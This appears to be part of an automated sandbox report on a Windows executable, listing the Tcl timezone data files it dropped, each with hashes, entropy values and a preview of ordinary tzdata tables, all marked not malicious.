                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Regina) {. {-9223372036854775808 -25116 0 LMT}. {-2030202084 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1251651600 -21600 1 MDT}. {-1238349600 -25200 0 MST}. {-1220202000 -21600 1 MDT}. {-1206900000 -25200 0 MST}. {-1188752400 -21600 1 MDT}. {-1175450400 -25200 0 MST}. {-1156698000 -21600 1 MDT}. {-1144000800 -25200 0 MST}. {-1125248400 -21600 1 MDT}. {-1111946400 -25200 0 MST}. {-1032714000 -21600 1 MDT}. {-1016992800 -25200 0 MST}. {-1001264400 -21600 1 MDT}. {-986148000 -25200 0 MST}. {-969814800 -21600 1 MDT}. {-954093600 -25200 0 MST}. {-937760400 -21600 1 MDT}. {-922039200 -25200 0 MST}. {-906310800 -21600 1 MDT}. {-890589600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-748450800 -21600 1 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Resolute

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7362
                                                                                                                                                                                                                                                    Entropy (8bit):3.7499369602687835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:tw5/9/yuvQ+hcrD57X0N41+IstuNESkzbXwDTIRqfhXbdXvDXpVXVto//q7u379L:tw5/9/yuvQ6crD57X0N41+IstuNESkzV
                                                                                                                                                                                                                                                    MD5:224BE093D948CE13FD07C5E52D0D79D0
                                                                                                                                                                                                                                                    SHA1:DEE0C0BB79F8D31CB023A3CA665B488A2C906BD5
                                                                                                                                                                                                                                                    SHA-256:BF3DA96E2199A2C8683F5BF4AB1501090977C913F396804983C12DEB4DEEDD29
                                                                                                                                                                                                                                                    SHA-512:622CFD5BE51DEE1DFDFFD909C4662D987F39C4556E9777F69A3538D920C1977FC05478C2D2DCD21BF9413D3D1FE7B5E218479CA36BBB70DD1F9CC8D4168602AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Resolute) {. {-9223372036854775808 0 0 zzz}. {-704937600 -21600 0 CST}. {-147895200 -14400 1 CDDT}. {-131565600 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}. {499244400 -21600 0 CST}. {514972800 -18000 1 CDT}. {530694000 -21600 0 CST}. {544608000 -18000 1 CDT}. {562143600 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {607507200 -18000 1 CDT}. {625647600 -21600 0 CST}. {638956800 -18000 1 CDT}. {657097200 -21600 0 CST}. {671011200 -18000 1 CDT}. {688546800 -21600 0 CST}. {702460800 -18000 1 CDT}. {719996400 -21600 0 CST}. {733910400 -18000 1 CDT}. {752050800

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Rio_Branco

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1089
                                                                                                                                                                                                                                                    Entropy (8bit):4.045206708366327
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQYEeH5uwss/uS+L/ux+y/up+a/uj+Ne/ud+Rs/uX4+G/u43+a/uo8+h/u1F+E/m:5q5ZsQt8uqwd4rghFGRhGj+tX1s0zT
                                                                                                                                                                                                                                                    MD5:53C093ADEAA61B7ABB5B367D6D32D363
                                                                                                                                                                                                                                                    SHA1:B8E18AD6F004FD394984A25102D5062E30A1220C
                                                                                                                                                                                                                                                    SHA-256:FFA24B23811172EA600402CECCF4EAC78EACD5EE37CE59632BCA4F46C6BC56B1
                                                                                                                                                                                                                                                    SHA-512:107CAC60BC625AA6D0C169FDA13A618F65CE4C1F5FBB193DE8B421D77A27AC4606624F5E7BC903CC28D305AFDF06E8FF12A5845E865BDBE7B81425AC4E67DC93
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rio_Branco) {. {-9223372036854775808 -16272 0 LMT}. {-1767209328 -18000 0 ACT}. {-1206950400 -14400 1 ACST}. {-1191355200 -18000 0 ACT}. {-1175367600 -14400 1 ACST}. {-1159819200 -18000 0 ACT}. {-633812400 -14400 1 ACST}. {-622062000 -18000 0 ACT}. {-602276400 -14400 1 ACST}. {-591825600 -18000 0 ACT}. {-570740400 -14400 1 ACST}. {-560203200 -18000 0 ACT}. {-539118000 -14400 1 ACST}. {-531345600 -18000 0 ACT}. {-191358000 -14400 1 ACST}. {-184190400 -18000 0 ACT}. {-155156400 -14400 1 ACST}. {-150062400 -18000 0 ACT}. {-128890800 -14400 1 ACST}. {-121118400 -18000 0 ACT}. {-99946800 -14400 1 ACST}. {-89582400 -18000 0 ACT}. {-68410800 -14400 1 ACST}. {-57960000 -18000 0 ACT}. {499755600 -14400 1 ACST}. {511243200 -18000 0 ACT}. {530600400 -14400 1 ACST}. {540273600 -18000 0 ACT}. {562136400 -14400 1 ACST}. {571204800 -18000 0 ACT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Rosario

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):214
                                                                                                                                                                                                                                                    Entropy (8bit):4.752946571641783
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7/MdVAIgp/MOF290rI5290/Msn:MBaIMY/M4p/MOF290r190/Ms
                                                                                                                                                                                                                                                    MD5:4FC460A084DF33A73F2F87B7962B0084
                                                                                                                                                                                                                                                    SHA1:45E70D5D68FC2DE0ACFF76B062ADA17E0021460F
                                                                                                                                                                                                                                                    SHA-256:D1F5FFD2574A009474230E0AA764256B039B1D78D91A1CB944B21776377B5B70
                                                                                                                                                                                                                                                    SHA-512:40045420FE88FA54DE4A656534C0A51357FBAB3EA3B9120DA15526A9DEC7EEC2C9799F4D9A72B6050474AD67490BC28540FDA0F17B7FCAF125D41CBCA96ECCDE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Cordoba)]} {. LoadTimeZoneFile America/Argentina/Cordoba.}.set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Santa_Isabel

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8445
                                                                                                                                                                                                                                                    Entropy (8bit):3.7709584779896055
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:Sb4I5mC2ZCAFrAdjyuqd3SHdbV2zSd61u/XZ9ma3mL9:25DarAdjyuqg9bV2x1uCp
                                                                                                                                                                                                                                                    MD5:DCF171E7C58C232BF1F477BD038D15B8
                                                                                                                                                                                                                                                    SHA1:0C3FFF0FDC52537C406EF2598FCBFD26831D69A7
                                                                                                                                                                                                                                                    SHA-256:D1F9859973D8B4E98F57D097F12C32DA9A9CFF6E91F71A7355F41C22BADA6F58
                                                                                                                                                                                                                                                    SHA-512:7370B5D5C199525CD000CEDFE58BCDD8DB8FD5E34CD923E622B6917FC1328DA53653D9B904A5F70371704BEFDB6335BA32C83869857D95CFA78620D54B9A140D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santa_Isabel) {. {-9223372036854775808 -27568 0 LMT}. {-1514736000 -25200 0 MST}. {-1451667600 -28800 0 PST}. {-1343062800 -25200 0 MST}. {-1234803600 -28800 0 PST}. {-1222963200 -25200 1 PDT}. {-1207242000 -28800 0 PST}. {-873820800 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-761677200 -28800 0 PST}. {-686073600 -25200 1 PDT}. {-661539600 -28800 0 PST}. {-504892800 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {-337183200 -25200 1 PDT}. {-323881200 -28800 0 PST}. {-305733600 -25200 1 PDT}. {-292431600 -28800 0 PST}. {-283968000 -28800 0 PST}. {189331200 -28800 0 PST}. {199274400 -25200 1 PDT}. {

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Santarem

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1057
                                                                                                                                                                                                                                                    Entropy (8bit):4.04156999168428
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQceUho6Skl7s/oySklTs/oiSklP/otHSkl8/oNOSkll/osSklGo/ooSklR/o9S8:5v6SklVySklTpiSklo5Skl5oSklOsSk8
                                                                                                                                                                                                                                                    MD5:16E6B322ADE028816D19A348B1E9D901
                                                                                                                                                                                                                                                    SHA1:108A88CBE875DBAD31F8AA7611AEC99BF37A6554
                                                                                                                                                                                                                                                    SHA-256:39DF7B763BDB6153DD5916DCE4D220F9A911FCAEBC1FC617C5FF632BD83B2041
                                                                                                                                                                                                                                                    SHA-512:20DA68089C4418E1EFFE987DB5EB6EBA6F82271C236AF1FCBFFAD5450BB2C03CC3D77CA7696965C841EE6B0DE1656FBF8350EBF6A660975B90B87D33841EF78D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santarem) {. {-9223372036854775808 -13128 0 LMT}. {-1767212472 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Santiago

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3625
                                                                                                                                                                                                                                                    Entropy (8bit):3.8369221295859357
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:LN0ZC/bD/BUZrHljtDqM5rgVXHLugM981i+SLWXzx6z31ho1VmTfE3syJvZ1IOqF:LiC/bD/BUZrHljtDqM5rgV7ugM981i+q
                                                                                                                                                                                                                                                    MD5:7F98F2C2A8286463B0F1A7BBAA255FE4
                                                                                                                                                                                                                                                    SHA1:D1D92C0CD91CDBF3C1C0CA78FAEB7C28344C5885
                                                                                                                                                                                                                                                    SHA-256:13115FEDE9F39E883DD8975E198022AF50C57E50D9862302B6A94A95FB732E29
                                                                                                                                                                                                                                                    SHA-512:DD44E6BC95E87E5B99B3389A0E8D1194D73FCEDC8436FBE00F9916B55CC6A9E1711CBA1BA0B473F8BE2ACB63E01CC4EFF5CA803ECBE17A0E83299742FF80DBAA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santiago) {. {-9223372036854775808 -16966 0 LMT}. {-2524504634 -16966 0 SMT}. {-1892661434 -18000 0 CLT}. {-1688410800 -16966 0 SMT}. {-1619205434 -14400 0 CLT}. {-1593806400 -16966 0 SMT}. {-1335986234 -18000 0 CLT}. {-1335985200 -14400 1 CLST}. {-1317585600 -18000 0 CLT}. {-1304362800 -14400 1 CLST}. {-1286049600 -18000 0 CLT}. {-1272826800 -14400 1 CLST}. {-1254513600 -18000 0 CLT}. {-1241290800 -14400 1 CLST}. {-1222977600 -18000 0 CLT}. {-1209754800 -14400 1 CLST}. {-1191355200 -18000 0 CLT}. {-1178132400 -14400 0 CLT}. {-870552000 -18000 0 CLT}. {-865278000 -14400 0 CLT}. {-740520000 -10800 1 CLST}. {-736376400 -14400 0 CLT}. {-718056000 -18000 0 CLT}. {-713649600 -14400 0 CLT}. {-36619200 -10800 1 CLST}. {-23922000 -14400 0 CLT}. {-3355200 -10800 1 CLST}. {7527600 -14400 0 CLT}. {24465600 -10800 1 CLST}. {37767600 -14400 0 CLT

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Santo_Domingo

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                                                                                    Entropy (8bit):4.346772162962135
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp5290/SyJmdHhvPu4/G/uFNM/KMVv5/+MVvYx/r0XVvpUB/B7Vvo6I8/05aVvH:cQ+DJeVu4e/uICE5FYxwdpUBZpo65VAO
                                                                                                                                                                                                                                                    MD5:EE407C833EB0E28801B27356ABA678E3
                                                                                                                                                                                                                                                    SHA1:DD22E7B4FFA07B7A97804E92DA3CD8772C2D7507
                                                                                                                                                                                                                                                    SHA-256:72347F7D89EC3D7025FCC3AA0DDA2D594F11BAA12EF2AB55F1677AC4DD5AFE88
                                                                                                                                                                                                                                                    SHA-512:3DDD1C02AB0BC3005B9CD4F58F6349D7001D55F78A51E9D363D98B23B11C78B631B81DAC762E9F18352C2DB612C05E855BB1C0156A148E720C848EBABF48371B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santo_Domingo) {. {-9223372036854775808 -16776 0 LMT}. {-2524504824 -16800 0 SDMT}. {-1159773600 -18000 0 EST}. {-100119600 -14400 1 EDT}. {-89668800 -18000 0 EST}. {-5770800 -16200 1 EHDT}. {4422600 -18000 0 EST}. {25678800 -16200 1 EHDT}. {33193800 -18000 0 EST}. {57733200 -16200 1 EHDT}. {64816200 -18000 0 EST}. {89182800 -16200 1 EHDT}. {96438600 -18000 0 EST}. {120632400 -16200 1 EHDT}. {127974600 -18000 0 EST}. {152082000 -14400 0 AST}. {975823200 -14400 0 AST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Sao_Paulo

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7678
                                                                                                                                                                                                                                                    Entropy (8bit):3.782328041884024
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:LdP+2+j+R+u+W+B5+M+A+r+L+v+8+h+2+M+Y+v+c+M+++v+8+/+C+jZ+E+2+A++q:LGWbb8B4
                                                                                                                                                                                                                                                    MD5:B9596E3584EBAFEA5D0257129A03F06D
                                                                                                                                                                                                                                                    SHA1:6FD25D7D4D7A5320D981FF001AAB57EFDB852313
                                                                                                                                                                                                                                                    SHA-256:FA6B2AF6815C1BA6751F0807FEAB49E5E60B4C774A45A96EC6EC3563DA358463
                                                                                                                                                                                                                                                    SHA-512:215BEACD30BC54F416C74A98B597E5B1EEDE627121BF58A12F829E55F921FD3EF9C1C6FF0F639D1929882BC0E7380E73038AA6BFD49E6E7BF28A7711802F4212
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sao_Paulo) {. {-9223372036854775808 -11188 0 LMT}. {-1767214412 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-195429600 -7200 1 BRST}. {-189381600 -7200 0 BRT}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Scoresbysund

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6713
                                                                                                                                                                                                                                                    Entropy (8bit):3.7831757008437528
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:P0pq6GNOHfSPRayJvZbzmgyb9qqv95aZIhlVeDEzm:EqBOHfSPRayHbNyb9FHzm
                                                                                                                                                                                                                                                    MD5:29C14A9AFA37EFB29DF4424EB905D3FA
                                                                                                                                                                                                                                                    SHA1:35C7F008987D19925D2BC8C06F31B2F1B323478E
                                                                                                                                                                                                                                                    SHA-256:424C05FE8CE2EB094A0840C97286EC3E32B03B73AE92BC34F68E4E986041615E
                                                                                                                                                                                                                                                    SHA-512:A5F933CD082BD6D09DAF64D2245EA043D2A11A3E0E3373D3877CD4AAF4D6BB5BF9C62771C16AF097B1C9E34CF035F95967537ECD2521B9D074C3C33A43559E93
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Scoresbysund) {. {-9223372036854775808 -5272 0 LMT}. {-1686090728 -7200 0 CGT}. {323841600 -3600 0 CGST}. {338961600 -7200 0 CGT}. {354679200 0 0 EGST}. {370400400 -3600 0 EGT}. {386125200 0 1 EGST}. {401850000 -3600 0 EGT}. {417574800 0 1 EGST}. {433299600 -3600 0 EGT}. {449024400 0 1 EGST}. {465354000 -3600 0 EGT}. {481078800 0 1 EGST}. {496803600 -3600 0 EGT}. {512528400 0 1 EGST}. {528253200 -3600 0 EGT}. {543978000 0 1 EGST}. {559702800 -3600 0 EGT}. {575427600 0 1 EGST}. {591152400 -3600 0 EGT}. {606877200 0 1 EGST}. {622602000 -3600 0 EGT}. {638326800 0 1 EGST}. {654656400 -3600 0 EGT}. {670381200 0 1 EGST}. {686106000 -3600 0 EGT}. {701830800 0 1 EGST}. {717555600 -3600 0 EGT}. {733280400 0 1 EGST}. {749005200 -3600 0 EGT}. {764730000 0 1 EGST}. {780454800 -3600 0 EGT}. {796179600 0 1 EGST}. {811904400 -3600 0 EGT

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Shiprock

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.840231755053259
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0L2IAcGEtOFBx+IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iL290tO09G
                                                                                                                                                                                                                                                    MD5:65307038DB12A7A447284DF4F3E6A3E8
                                                                                                                                                                                                                                                    SHA1:DC28D6863986D7A158CEF239D46BE9F5033DF897
                                                                                                                                                                                                                                                    SHA-256:3FD862C9DB2D5941DFDBA5622CC53487A7FC5039F7012B78D3EE4B58753D078D
                                                                                                                                                                                                                                                    SHA-512:91BC29B7EC9C49D4020DC26F682D0EFBBBEE83D10D79C766A08C78D5FF04D9C0A09288D9696A378E777B65E0C2C2AC8A218C12F86C45BD6E7B5E204AE5FC2335
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:America/Shiprock) $TZData(:America/Denver).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Sitka

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8376
                                                                                                                                                                                                                                                    Entropy (8bit):3.8797731776796454
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:6G19jJps/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:6M9jI/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                    MD5:6A3014865B6330673B4F71C1617C486B
                                                                                                                                                                                                                                                    SHA1:52334201654D421DD97D62D0C12065308E6A9D56
                                                                                                                                                                                                                                                    SHA-256:92C6A715A1994EC61D8879A763EEF2B06FFC15876306DD6262ABBD5D3DA23CE0
                                                                                                                                                                                                                                                    SHA-512:B957F258BDBDDA043AF2FE8D66AE6247998A7CE398A56C641FF4DEA8F70BB63652D8B223F783E82B18570E28AB11E76CB1DA2BE6648F449F9F4D745987E109D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sitka) {. {-9223372036854775808 53927 0 LMT}. {-3225365927 -32473 0 LMT}. {-2188954727 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677600 -

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\St_Barthelemy

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):208
                                                                                                                                                                                                                                                    Entropy (8bit):4.905980413237828
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290txP90e/:MBaIMY9QpI2907P90O
                                                                                                                                                                                                                                                    MD5:B6E45D20EB8CC73A77B9A75578E5C246
                                                                                                                                                                                                                                                    SHA1:19C6BB6ED12B6943CF7BDFFE4C8A8D72DB491E44
                                                                                                                                                                                                                                                    SHA-256:31E60EAC8ABFA8D3DAD501D3BCDCA7C4DB7031B65ADDA24EC11A6DEE1E3D14C3
                                                                                                                                                                                                                                                    SHA-512:C0F3BF8D106E77C1000E45D0A6C8E7C05B7B97EFA2EECCA45FEF48EB42FBDD5336FD551C794064EADFB6919A12813FF66B2F95722877432B4A48B1FBA6C5409D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Barthelemy) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\St_Johns

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10917
                                                                                                                                                                                                                                                    Entropy (8bit):3.7872036312069963
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Vvprjhbvd8mSGu9EnkBVAZK2GrbrvZeuqpNFT:Vvbvd7SGu9lzoVpDT
                                                                                                                                                                                                                                                    MD5:F87531D6DC9AAFB2B0F79248C5ADA772
                                                                                                                                                                                                                                                    SHA1:E14C52B0F564FA3A3536B7576A2B27D4738CA76B
                                                                                                                                                                                                                                                    SHA-256:0439DA60D4C52F0E777431BF853D366E2B5D89275505201080954D88F6CA9478
                                                                                                                                                                                                                                                    SHA-512:5B43CE25D970EEEFD09865D89137388BD879C599191DE8ACE37DA657C142B6DF63143DBF9DED7659CBD5E45BAB699E2A3AFDD28C76A7CB2F300EBD9B74CDA59D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
